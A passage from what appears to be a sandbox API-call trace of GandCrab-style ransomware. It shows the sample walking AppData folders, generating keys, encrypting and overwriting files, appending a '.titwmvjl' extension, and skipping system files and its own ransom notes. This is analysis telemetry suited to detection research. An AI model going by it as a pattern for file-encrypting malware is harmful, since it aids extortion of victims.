(lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.680] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.680] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.680] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0071.680] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.680] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.680] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.681] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.681] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.681] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.682] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.682] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.682] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0071.682] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.682] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.682] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.682] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.682] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.683] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.683] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503938) returned 1 [0071.683] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.683] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.683] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.684] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.684] GetLastError () returned 0x0 [0071.684] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.684] CryptDestroyKey (hKey=0x503938) returned 1 [0071.684] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.684] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.684] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.685] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.685] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.685] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503938) returned 1 [0071.685] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.686] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.686] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.686] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.686] GetLastError () returned 0x0 [0071.686] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.686] CryptDestroyKey (hKey=0x503938) returned 1 [0071.687] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.687] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.687] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0071.687] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0071.687] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x3d5c8, lpOverlapped=0x0) returned 1 [0071.701] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffc2a38, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.701] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x3d5c8, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x3d5c8, lpOverlapped=0x0) returned 1 [0071.704] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.704] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0071.706] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.711] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.712] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.713] CloseHandle (hObject=0x2cc) returned 1 [0071.718] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl.titwmvjl"), dwFlags=0x1) returned 1 [0071.719] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.720] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0071.720] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0071.720] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0071.720] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TITWMVJL-DECRYPT.txt" [0071.720] lstrlenW (lpString=".titwmvjl") returned 9 [0071.720] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TITWMVJL-DECRYPT.txt") returned 87 [0071.720] VirtualAlloc (lpAddress=0x0, dwSize=0xee, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.720] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 96 [0071.720] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TITWMVJL-DECRYPT.txt") returned 87 [0071.720] lstrlenW (lpString=".txt") returned 4 [0071.720] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.720] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0071.720] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0071.721] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.721] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TITWMVJL-DECRYPT.txt") returned 87 [0071.721] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TITWMVJL-DECRYPT.txt") returned 87 [0071.721] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0071.721] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0071.721] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0071.721] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0071.721] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0071.721] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0071.721] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0071.721] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0071.721] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.721] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0071.722] lstrcmpW (lpString1="TURABIAN.XSL", lpString2=".") returned 1 [0071.722] lstrcmpW (lpString1="TURABIAN.XSL", lpString2="..") returned 1 [0071.722] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\", lpString2="TURABIAN.XSL" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL" [0071.722] lstrlenW (lpString=".titwmvjl") returned 9 [0071.722] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 79 [0071.722] VirtualAlloc (lpAddress=0x0, dwSize=0xde, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.722] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL.titwmvjl") returned 88 [0071.722] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 79 [0071.722] lstrlenW (lpString=".XSL") returned 4 [0071.722] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.722] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".XSL ") returned 5 [0071.722] lstrcmpiW (lpString1=".XSL", lpString2=".titwmvjl") returned 1 [0071.722] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.723] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 79 [0071.723] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 79 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="desktop.ini") returned 1 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="autorun.inf") returned 1 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="ntuser.dat") returned 1 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="iconcache.db") returned 1 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="bootsect.bak") returned 1 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="boot.ini") returned 1 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="ntuser.dat.log") returned 1 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="thumbs.db") returned 1 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="KRAB-DECRYPT.html") returned 1 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="CRAB-DECRYPT.html") returned 1 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="KRAB-DECRYPT.txt") returned 1 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="CRAB-DECRYPT.txt") returned 1 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="ntldr") returned 1 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="NTDETECT.COM") returned 1 [0071.723] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="Bootfont.bin") returned 1 [0071.723] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL") returned 79 [0071.723] lstrlenW (lpString=".XSL") returned 4 [0071.723] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.724] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".XSL ") returned 5 [0071.724] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.724] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.724] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0071.726] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.726] ReadFile (in: hFile=0x2cc, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0071.741] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.741] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.742] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.742] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.742] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.743] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.743] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0071.743] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.743] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.743] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.743] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.743] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4cdb38) returned 1 [0071.744] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0071.744] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0071.744] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0071.744] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0071.745] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.745] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.745] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.745] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.745] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.746] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.746] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5035b8) returned 1 [0071.746] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.746] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.746] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.746] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.747] GetLastError () returned 0x0 [0071.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.747] CryptDestroyKey (hKey=0x5035b8) returned 1 [0071.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.747] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.747] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4cdb38) returned 1 [0071.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.748] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503638) returned 1 [0071.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.748] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0071.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.749] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e974*=0x100) returned 1 [0071.749] GetLastError () returned 0x0 [0071.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.749] CryptDestroyKey (hKey=0x503638) returned 1 [0071.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0071.749] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0071.750] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0071.750] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0071.750] ReadFile (in: hFile=0x2cc, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ea20*=0x54256, lpOverlapped=0x0) returned 1 [0071.771] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffabdaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0071.772] WriteFile (in: hFile=0x2cc, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0x54256, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ea04*=0x54256, lpOverlapped=0x0) returned 1 [0071.774] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.774] WriteFile (in: hFile=0x2cc, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0071.775] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.779] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.780] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.780] CloseHandle (hObject=0x2cc) returned 1 [0071.786] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\TURABIAN.XSL.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\bibliography\\style\\turabian.xsl.titwmvjl"), dwFlags=0x1) returned 1 [0071.787] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.787] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0071.787] FindClose (in: hFindFile=0x5033b8 | out: hFindFile=0x5033b8) returned 1 [0071.788] CloseHandle (hObject=0x2c4) returned 1 [0071.788] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0071.788] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0071.788] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0071.788] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\TITWMVJL-DECRYPT.txt" [0071.788] lstrlenW (lpString=".titwmvjl") returned 9 [0071.788] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\TITWMVJL-DECRYPT.txt") returned 81 [0071.788] VirtualAlloc (lpAddress=0x0, dwSize=0xe2, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0071.789] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 90 [0071.789] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\TITWMVJL-DECRYPT.txt") returned 81 [0071.789] lstrlenW (lpString=".txt") returned 4 [0071.789] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0071.789] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0071.789] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0071.789] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.789] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\TITWMVJL-DECRYPT.txt") returned 81 [0071.789] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\TITWMVJL-DECRYPT.txt") returned 81 [0071.789] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0071.789] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0071.789] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0071.789] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0071.789] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0071.789] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0071.789] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0071.789] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0071.789] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.789] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0071.789] FindClose (in: hFindFile=0x5037b8 | out: hFindFile=0x5037b8) returned 1 [0071.790] CloseHandle (hObject=0x2bc) returned 1 [0071.790] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0071.790] lstrcmpW (lpString1="Credentials", lpString2=".") returned 1 [0071.790] lstrcmpW (lpString1="Credentials", lpString2="..") returned 1 [0071.790] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="Credentials" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials" [0071.791] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\" [0071.791] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0071.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0071.791] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program 